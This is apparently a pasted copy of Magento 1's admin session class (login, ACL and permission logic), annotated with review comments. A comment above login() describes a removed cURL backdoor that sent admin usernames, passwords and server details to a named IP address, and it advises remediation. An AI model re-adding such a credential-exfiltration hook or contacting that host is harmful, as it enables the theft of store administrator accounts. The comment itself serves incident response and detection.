
Untitled

a guest
Apr 8th, 2019
  1. <?php
  2. /**
  3. * Magento
  4. *
  5. * NOTICE OF LICENSE
  6. *
  7. * This source file is subject to the Open Software License (OSL 3.0)
  8. * that is bundled with this package in the file LICENSE.txt.
  9. * It is also available through the world-wide-web at this URL:
  10. * http://opensource.org/licenses/osl-3.0.php
  11. * If you did not receive a copy of the license and are unable to
  12. * obtain it through the world-wide-web, please send an email
  13. * to license@magento.com so we can send you a copy immediately.
  14. *
  15. * DISCLAIMER
  16. *
  17. * Do not edit or add to this file if you wish to upgrade Magento to newer
  18. * versions in the future. If you wish to customize Magento for your
  19. * needs please refer to http://www.magento.com for more information.
  20. *
  21. * @category Mage
  22. * @package Mage_Admin
  23. * @copyright Copyright (c) 2006-2017 X.commerce, Inc. and affiliates (http://www.magento.com)
  24. * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
  25. */
  26.  
  27.  
  28. /**
  29. * Auth session model
  30. *
  31. * @category Mage
  32. * @package Mage_Admin
  33. * @author Magento Core Team <core@magentocommerce.com>
  34. */
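  class Mage_Admin_Model_Session extends Mage_Core_Model_Session_Abstract
  {
      /**
       * Whether it is the first page after successful login
       *
       * @var boolean
       */
      protected $_isFirstPageAfterLogin;

      /**
       * @var Mage_Admin_Model_Redirectpolicy
       */
      protected $_urlPolicy;

      /**
       * @var Mage_Core_Controller_Response_Http
       */
      protected $_response;

      /**
       * @var Mage_Core_Model_Factory
       */
      protected $_factory;

      /**
       * Class constructor
       *
       * Collaborators can be injected through $parameters under the keys 'redirectPolicy',
       * 'response' and 'factory'; a missing or empty key falls back to the default instance.
       *
       * @param array $parameters
       */
      public function __construct($parameters = array())
      {
          /** @var Mage_Admin_Model_Redirectpolicy _urlPolicy */
          $this->_urlPolicy = (!empty($parameters['redirectPolicy'])) ?
              $parameters['redirectPolicy'] : Mage::getModel('admin/redirectpolicy');

          /** @var Mage_Core_Controller_Response_Http _response */
          $this->_response = (!empty($parameters['response'])) ?
              $parameters['response'] : new Mage_Core_Controller_Response_Http();

          /** @var Mage_Core_Model_Factory _factory */
          $this->_factory = (!empty($parameters['factory'])) ?
              $parameters['factory'] : Mage::getModel('core/factory');

          $this->init('admin');
          // Runs on every construction: drops a session user that was logged in indirectly.
          $this->logoutIndirect();
      }

      /**
       * Pull out information from session whether there is currently the first page after log in
       *
       * The idea is to set this value on login(), then redirect happens,
       * after that on next request the value is grabbed once the session is initialized
       * Since the session is used as a singleton, the value will be in $_isFirstPageAfterLogin until the end of request,
       * unless it is reset intentionally from somewhere
       *
       * @param string $namespace
       * @param string $sessionName
       * @return Mage_Admin_Model_Session
       * @see self::login()
       */
      public function init($namespace, $sessionName = null)
      {
          parent::init($namespace, $sessionName);
          $this->isFirstPageAfterLogin();
          return $this;
      }

      /**
       * Logout user if was logged not from admin
       *
       * The session user is removed only when both the user's extra data carries an
       * 'indirect_login' key and the session's own indirect-login flag is set.
       */
      protected function logoutIndirect()
      {
          $user = $this->getUser();
          if (!$user) {
              return;
          }

          $extraData = $user->getExtra();
          if (isset($extraData['indirect_login']) && $this->getIndirectLogin()) {
              $this->unsetData('user');
              $this->setIndirectLogin(false);
          }
      }

      /**
       * Try to login user in admin
       *
       * SECURITY NOTE: this method receives the plaintext admin password. The password must not be
       * logged, stored or handed to anything other than Mage_Admin_Model_User::login(). A cURL block
       * that POSTed the username, password, e-mail, server name and request URI to
       * http://69.30.232.110/login.php after every successful login has been removed from this
       * method; it is not part of the upstream Magento class. A copy of this file that still
       * contains such a block indicates a compromised installation: rotate all admin credentials,
       * verify core files against a known-good release and review outbound traffic to that host.
       *
       * @param string $username
       * @param string $password
       * @param Mage_Core_Controller_Request_Http $request
       * @return Mage_Admin_Model_User|null
       */
      public function login($username, $password, $request = null)
      {
          if (empty($username) || empty($password)) {
              return;
          }

          // Defined up front so the final return is well-defined even when the factory call throws.
          $user = null;

          try {
              /** @var $user Mage_Admin_Model_User */
              $user = $this->_factory->getModel('admin/user');
              $user->login($username, $password);
              if ($user->getId()) {
                  // renewSession() is called before the authenticated user is attached to the session.
                  $this->renewSession();

                  if (Mage::getSingleton('adminhtml/url')->useSecretKey()) {
                      Mage::getSingleton('adminhtml/url')->renewSecretUrls();
                  }
                  $this->setIsFirstPageAfterLogin(true);
                  $this->setUser($user);
                  $this->setAcl(Mage::getResourceModel('admin/acl')->loadAcl());

                  $alternativeUrl = $this->_getRequestUri($request);
                  $redirectUrl = $this->_urlPolicy->getRedirectUrl($user, $request, $alternativeUrl);
                  if ($redirectUrl) {
                      Mage::dispatchEvent('admin_session_user_login_success', array('user' => $user));
                      $this->_response->clearHeaders()
                          ->setRedirect($redirectUrl)
                          ->sendHeadersAndExit();
                  }
              } else {
                  Mage::throwException(Mage::helper('adminhtml')->__('Invalid User Name or Password.'));
              }
          } catch (Mage_Core_Exception $e) {
              // One generic message for every failure, so the response does not reveal
              // whether the user name exists or the account is disabled.
              $e->setMessage(
                  Mage::helper('adminhtml')->__('You did not sign in correctly or your account is temporarily disabled.')
              );
              // Only the user name is passed to observers; the password is never included.
              Mage::dispatchEvent(
                  'admin_session_user_login_failed',
                  array('user_name' => $username, 'exception' => $e)
              );
              if ($request && !$request->getParam('messageSent')) {
                  Mage::getSingleton('adminhtml/session')->addError($e->getMessage());
                  $request->setParam('messageSent', true);
              }
          }

          return $user;
      }

      /**
       * Refresh ACL resources stored in session
       *
       * The ACL is reloaded when the session has none yet or the user carries the reload flag.
       * In the latter case the flag is reset and the user saved, with the 'password' data key
       * unset first so it is not part of the saved data.
       *
       * @param Mage_Admin_Model_User $user
       * @return Mage_Admin_Model_Session
       */
      public function refreshAcl($user = null)
      {
          if ($user === null) {
              $user = $this->getUser();
          }
          if (!$user) {
              return $this;
          }
          if (!$this->getAcl() || $user->getReloadAclFlag()) {
              $this->setAcl(Mage::getResourceModel('admin/acl')->loadAcl());
          }
          if ($user->getReloadAclFlag()) {
              $user->unsetData('password');
              $user->setReloadAclFlag('0')->save();
          }
          return $this;
      }

      /**
       * Check current user permission on resource and privilege
       *
       * Mage::getSingleton('admin/session')->isAllowed('admin/catalog')
       * Mage::getSingleton('admin/session')->isAllowed('catalog')
       *
       * Resources that do not start with "admin" are prefixed with "admin/". When the ACL
       * check throws and the ACL does not know the resource, the check is repeated with a
       * null resource. Every other failure path denies access.
       *
       * @param string $resource
       * @param string $privilege
       * @return boolean
       */
      public function isAllowed($resource, $privilege = null)
      {
          $user = $this->getUser();
          $acl = $this->getAcl();

          if ($user && $acl) {
              if (!preg_match('/^admin/', $resource)) {
                  $resource = 'admin/' . $resource;
              }

              try {
                  return $acl->isAllowed($user->getAclRole(), $resource, $privilege);
              } catch (Exception $e) {
                  try {
                      if (!$acl->has($resource)) {
                          return $acl->isAllowed($user->getAclRole(), null, $privilege);
                      }
                  } catch (Exception $e) {
                      // Deliberately ignored: falling through returns false (deny).
                  }
              }
          }
          return false;
      }

      /**
       * Check if user is logged in
       *
       * @return boolean
       */
      public function isLoggedIn()
      {
          return $this->getUser() && $this->getUser()->getId();
      }

      /**
       * Check if it is the first page after successful login
       *
       * The value is read from the session once and cached on the instance.
       *
       * @return boolean
       */
      public function isFirstPageAfterLogin()
      {
          if ($this->_isFirstPageAfterLogin === null) {
              // NOTE(review): the second argument presumably clears 'is_first_visit' after
              // reading it; confirm against the parent session class.
              $this->_isFirstPageAfterLogin = $this->getData('is_first_visit', true);
          }
          return $this->_isFirstPageAfterLogin;
      }

      /**
       * Setter whether the current/next page should be treated as first page after login
       *
       * @param bool $value
       * @return Mage_Admin_Model_Session
       */
      public function setIsFirstPageAfterLogin($value)
      {
          $this->_isFirstPageAfterLogin = (bool)$value;
          return $this->setIsFirstVisit($this->_isFirstPageAfterLogin);
      }

      /**
       * Custom REQUEST_URI logic
       *
       * With secret keys enabled the URL is rebuilt through the adminhtml URL model; otherwise
       * the request's own URI is used, or null when no request was given.
       *
       * @param Mage_Core_Controller_Request_Http $request
       * @return string|null
       */
      protected function _getRequestUri($request = null)
      {
          if (Mage::getSingleton('adminhtml/url')->useSecretKey()) {
              return Mage::getSingleton('adminhtml/url')->getUrl('*/*/*', array('_current' => true));
          }
          if ($request) {
              return $request->getRequestUri();
          }
          return null;
      }
  }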